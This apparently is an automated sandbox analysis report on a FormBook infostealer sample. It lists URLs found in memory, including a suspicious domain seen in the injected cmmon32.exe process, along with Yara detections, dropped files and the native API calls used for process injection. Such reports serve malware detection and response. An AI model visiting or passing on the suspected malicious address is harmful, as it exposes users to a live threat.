          Source: explorer.exe, 00000004.00000000.242230700.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000004.00000000.242230700.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000004.00000000.242230700.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000004.00000000.242230700.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000004.00000000.242230700.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000004.00000000.242230700.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000004.00000000.242230700.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000004.00000000.242230700.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000004.00000000.242230700.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: cmmon32.exe, 0000000A.00000003.265339864.0000000000D1E000.00000004.00000001.sdmp, cmmon32.exe, 0000000A.00000003.265254633.0000000000D0E000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp
          Source: cmmon32.exe, 0000000A.00000003.265339864.0000000000D1E000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehpLMEM
          Source: cmmon32.exe, 0000000A.00000003.265339864.0000000000D1E000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehpN
          Source: cmmon32.exe, 0000000A.00000003.265254633.0000000000D0E000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
          Source: cmmon32.exe, 0000000A.00000003.265339864.0000000000D1E000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpLMEMh
          Source: cmmon32.exe, 0000000A.00000003.265254633.0000000000D0E000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpN
          Source: cmmon32.exe, 0000000A.00000003.265254633.0000000000D0E000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/ocid=iehp
          Source: cmmon32.exe, 0000000A.00000003.265254633.0000000000D0E000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/ocid=iehp
          Source: explorer.exe, 00000004.00000000.242230700.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000004.00000000.242230700.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000004.00000000.242230700.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: cmmon32.exe, 0000000A.00000002.480662361.0000000005089000.00000004.00000001.sdmpString found in binary or memory: http://www.thegamergang.com
          Source: cmmon32.exe, 0000000A.00000002.480662361.0000000005089000.00000004.00000001.sdmpString found in binary or memory: http://www.thegamergang.com/k8b/
          Source: explorer.exe, 00000004.00000000.242230700.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000004.00000000.242230700.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000004.00000000.242230700.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000004.00000000.242230700.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: cmmon32.exe, 0000000A.00000003.265339864.0000000000D1E000.00000004.00000001.sdmp, cmmon32.exe, 0000000A.00000003.265254633.0000000000D0E000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/
          Source: cmmon32.exe, 0000000A.00000003.265339864.0000000000D1E000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/5
          Source: cmmon32.exe, 0000000A.00000002.476667464.0000000000D1E000.00000004.00000020.sdmp, cmmon32.exe, 0000000A.00000003.265339864.0000000000D1E000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
          Source: cmmon32.exe, 0000000A.00000003.265339864.0000000000D1E000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0LMEM
          Source: cmmon32.exe, 0000000A.00000002.476667464.0000000000D1E000.00000004.00000020.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowser=0e/

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000002.260048280.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.260492658.0000000001510000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.226254725.0000000003DC9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.476303103.0000000000BA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.476424827.0000000000BE0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.260413976.00000000014E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.475886802.0000000000740000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.226169941.0000000003CE9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.xxgTjC4efAMDXvr.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.xxgTjC4efAMDXvr.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Detected FormBook malwareShow sources
          Source: C:\Windows\SysWOW64\cmmon32.exeDropped file: C:\Users\user\AppData\Roaming\L6725004\L67logri.iniJump to dropped file
          Source: C:\Windows\SysWOW64\cmmon32.exeDropped file: C:\Users\user\AppData\Roaming\L6725004\L67logrv.iniJump to dropped file
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000003.00000002.260048280.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.260048280.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.260492658.0000000001510000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.260492658.0000000001510000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.226254725.0000000003DC9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.226254725.0000000003DC9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.476303103.0000000000BA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.476303103.0000000000BA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.476424827.0000000000BE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.476424827.0000000000BE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.260413976.00000000014E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.260413976.00000000014E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.475886802.0000000000740000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.475886802.0000000000740000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.226169941.0000000003CE9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.226169941.0000000003CE9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.xxgTjC4efAMDXvr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.xxgTjC4efAMDXvr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.xxgTjC4efAMDXvr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.xxgTjC4efAMDXvr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 0_2_0A7C01A2 NtQuerySystemInformation,0_2_0A7C01A2
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 0_2_0A7C0167 NtQuerySystemInformation,0_2_0A7C0167
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_00419D40 NtCreateFile,3_2_00419D40
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_00419DF0 NtReadFile,3_2_00419DF0
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_00419E70 NtClose,3_2_00419E70
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_00419F20 NtAllocateVirtualMemory,3_2_00419F20
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_00419D3A NtCreateFile,3_2_00419D3A
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_00419DEA NtCreateFile,NtReadFile,3_2_00419DEA
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_00419E6B NtClose,3_2_00419E6B
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_00419F1A NtAllocateVirtualMemory,3_2_00419F1A
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AC99A0 NtCreateSection,LdrInitializeThunk,3_2_01AC99A0
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AC9910 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_01AC9910
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AC98F0 NtReadVirtualMemory,LdrInitializeThunk,3_2_01AC98F0
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AC9860 NtQuerySystemInformation,LdrInitializeThunk,3_2_01AC9860
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AC9840 NtDelayExecution,LdrInitializeThunk,3_2_01AC9840
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AC9A20 NtResumeThread,LdrInitializeThunk,3_2_01AC9A20
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AC9A00 NtProtectVirtualMemory,LdrInitializeThunk,3_2_01AC9A00
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AC9A50 NtCreateFile,LdrInitializeThunk,3_2_01AC9A50
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AC95D0 NtClose,LdrInitializeThunk,3_2_01AC95D0
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AC9540 NtReadFile,LdrInitializeThunk,3_2_01AC9540
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AC97A0 NtUnmapViewOfSection,LdrInitializeThunk,3_2_01AC97A0
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AC9780 NtMapViewOfSection,LdrInitializeThunk,3_2_01AC9780
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AC9710 NtQueryInformationToken,LdrInitializeThunk,3_2_01AC9710
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AC96E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_01AC96E0
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AC9660 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_01AC9660
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AC99D0 NtCreateProcessEx,3_2_01AC99D0
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AC9950 NtQueueApcThread,3_2_01AC9950
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AC98A0 NtWriteVirtualMemory,3_2_01AC98A0
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AC9820 NtEnumerateKey,3_2_01AC9820
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01ACB040 NtSuspendThread,3_2_01ACB040
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01ACA3B0 NtGetContextThread,3_2_01ACA3B0
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AC9B00 NtSetValueKey,3_2_01AC9B00
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AC9A80 NtOpenDirectoryObject,3_2_01AC9A80
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AC9A10 NtQuerySection,3_2_01AC9A10
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AC95F0 NtQueryInformationFile,3_2_01AC95F0
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AC9520 NtWaitForSingleObject,3_2_01AC9520
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01ACAD30 NtSetContextThread,3_2_01ACAD30
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AC9560 NtWriteFile,3_2_01AC9560
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AC9FE0 NtCreateMutant,3_2_01AC9FE0
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AC9730 NtQueryVirtualMemory,3_2_01AC9730
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01ACA710 NtOpenProcessToken,3_2_01ACA710
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AC9760 NtOpenProcess,3_2_01AC9760
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01ACA770 NtOpenThread,3_2_01ACA770
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AC9770 NtSetInformationFile,3_2_01AC9770
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AC96D0 NtCreateKey,3_2_01AC96D0
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AC9610 NtEnumerateValueKey,3_2_01AC9610
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AC9670 NtQueryInformationProcess,3_2_01AC9670
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AC9650 NtQueryValueKey,3_2_01AC9650
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04A49860 NtQuerySystemInformation,LdrInitializeThunk,10_2_04A49860
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04A49840 NtDelayExecution,LdrInitializeThunk,10_2_04A49840
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04A499A0 NtCreateSection,LdrInitializeThunk,10_2_04A499A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04A495D0 NtClose,LdrInitializeThunk,10_2_04A495D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04A49910 NtAdjustPrivilegesToken,LdrInitializeThunk,10_2_04A49910
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04A49560 NtWriteFile,LdrInitializeThunk,10_2_04A49560
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04A49540 NtReadFile,LdrInitializeThunk,10_2_04A49540
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04A496E0 NtFreeVirtualMemory,LdrInitializeThunk,10_2_04A496E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04A496D0 NtCreateKey,LdrInitializeThunk,10_2_04A496D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04A49610 NtEnumerateValueKey,LdrInitializeThunk,10_2_04A49610
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04A49660 NtAllocateVirtualMemory,LdrInitializeThunk,10_2_04A49660
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04A49650 NtQueryValueKey,LdrInitializeThunk,10_2_04A49650
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04A49A50 NtCreateFile,LdrInitializeThunk,10_2_04A49A50
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04A49780 NtMapViewOfSection,LdrInitializeThunk,10_2_04A49780
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04A49FE0 NtCreateMutant,LdrInitializeThunk,10_2_04A49FE0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04A49710 NtQueryInformationToken,LdrInitializeThunk,10_2_04A49710
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04A49770 NtSetInformationFile,LdrInitializeThunk,10_2_04A49770
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04A498A0 NtWriteVirtualMemory,10_2_04A498A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04A498F0 NtReadVirtualMemory,10_2_04A498F0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04A49820 NtEnumerateKey,10_2_04A49820
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04A4B040 NtSuspendThread,10_2_04A4B040
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04A495F0 NtQueryInformationFile,10_2_04A495F0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04A499D0 NtCreateProcessEx,10_2_04A499D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04A49520 NtWaitForSingleObject,10_2_04A49520
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04A4AD30 NtSetContextThread,10_2_04A4AD30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04A49950 NtQueueApcThread,10_2_04A49950
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04A49A80 NtOpenDirectoryObject,10_2_04A49A80
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04A49A20 NtResumeThread,10_2_04A49A20
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04A49A00 NtProtectVirtualMemory,10_2_04A49A00
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04A49A10 NtQuerySection,10_2_04A49A10
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04A49670 NtQueryInformationProcess,10_2_04A49670
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04A497A0 NtUnmapViewOfSection,10_2_04A497A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04A4A3B0 NtGetContextThread,10_2_04A4A3B0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04A49730 NtQueryVirtualMemory,10_2_04A49730
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04A49B00 NtSetValueKey,10_2_04A49B00
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04A4A710 NtOpenProcessToken,10_2_04A4A710
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04A49760 NtOpenProcess,10_2_04A49760
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04A4A770 NtOpenThread,10_2_04A4A770
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_00759D40 NtCreateFile,10_2_00759D40
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_00759DF0 NtReadFile,10_2_00759DF0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_00759E70 NtClose,10_2_00759E70
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_00759F20 NtAllocateVirtualMemory,10_2_00759F20
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_00759D3A NtCreateFile,10_2_00759D3A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_00759DEA NtCreateFile,NtReadFile,10_2_00759DEA
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_00759E6B NtClose,10_2_00759E6B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_00759F1A NtAllocateVirtualMemory,10_2_00759F1A
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 0_2_027932480_2_02793248
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 0_2_0279FA100_2_0279FA10
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 0_2_027956080_2_02795608
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 0_2_02794EE00_2_02794EE0
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 0_2_02795F000_2_02795F00
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 0_2_0279BFD80_2_0279BFD8
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 0_2_027943D00_2_027943D0
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 0_2_02790A700_2_02790A70
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 0_2_0279C2680_2_0279C268
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 0_2_02794E400_2_02794E40
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 0_2_0279323A0_2_0279323A
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 0_2_02798E100_2_02798E10
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 0_2_02797A080_2_02797A08
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 0_2_02798A080_2_02798A08
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 0_2_02795EF00_2_02795EF0
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 0_2_0279DEE80_2_0279DEE8
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 0_2_02799AC80_2_02799AC8
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 0_2_02799AB30_2_02799AB3
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 0_2_02794EB50_2_02794EB5
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 0_2_027942AB0_2_027942AB
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 0_2_027943670_2_02794367
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 0_2_02798BB80_2_02798BB8
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 0_2_02798BAA0_2_02798BAA
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 0_2_02798F900_2_02798F90
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 0_2_0279EB880_2_0279EB88
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 0_2_02798F800_2_02798F80
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 0_2_027984780_2_02798478
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 0_2_027984690_2_02798469
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 0_2_027978600_2_02797860
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 0_2_0279D9180_2_0279D918
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 0_2_027979F90_2_027979F9
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 0_2_027955F80_2_027955F8
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 0_2_027989F80_2_027989F8
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 0_2_05EF03480_2_05EF0348
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 0_2_05EF06100_2_05EF0610
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 0_2_05EF00700_2_05EF0070
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 0_2_05EF03380_2_05EF0338
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 0_2_05EF06000_2_05EF0600
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 0_2_05EF00170_2_05EF0017
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_004010303_2_00401030
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_0041D1583_2_0041D158
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_0041DA413_2_0041DA41
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_0041D3213_2_0041D321
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_0041DC0B3_2_0041DC0B
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_0041DD043_2_0041DD04
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_00402D883_2_00402D88
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_00402D903_2_00402D90
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_0041D5BC3_2_0041D5BC
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_00409E403_2_00409E40
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_00409E3C3_2_00409E3C
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_0041D7863_2_0041D786
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_00402FB03_2_00402FB0
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AA99BF3_2_01AA99BF
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AA41203_2_01AA4120
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01A8F9003_2_01A8F900
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AB20A03_2_01AB20A0
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01B520A83_2_01B520A8
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01A9B0903_2_01A9B090
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01B528EC3_2_01B528EC
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01B5E8243_2_01B5E824
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AAA8303_2_01AAA830
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01B410023_2_01B41002
